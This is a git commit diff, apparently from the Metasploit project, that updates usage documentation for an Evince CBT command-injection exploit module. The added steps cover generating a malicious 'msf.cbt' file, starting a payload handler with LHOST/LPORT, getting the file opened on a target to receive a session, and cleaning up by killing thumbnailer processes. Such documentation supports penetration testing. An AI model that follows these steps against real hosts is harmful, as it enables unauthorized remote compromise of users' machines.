Update documentation

This commit is contained in:
Brendan Coles
2019-02-03 06:18:18 +00:00
parent 9c3368f325
commit 46230efcd8
@@ -27,7 +27,10 @@
1. ```use exploit/multi/fileformat/evince_cbt_cmd_injection```
2. ```set PAYLOAD <PAYLOAD>```
3. ```run```
4. The module should generate the malicious `cbt` file
4. The module should generate the malicious `msf.cbt` file
5. ```handler -p <PAYLOAD> -H <LHOST> -P <LPORT>```
6. Copy `msf.cbt` to target host and open with Evince
7. You should receive a new session
## Options
@@ -68,3 +71,13 @@
Linux ubuntu-16-04-x64 4.4.0-140-generic #166-Ubuntu SMP Wed Nov 14 20:09:47 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
```
## Manual Cleanup
To prevent re-exploitation from a thumbnailer process:
```
/usr/bin/killall evince-thumbnailer
/usr/bin/killall atril-thumbnailer
```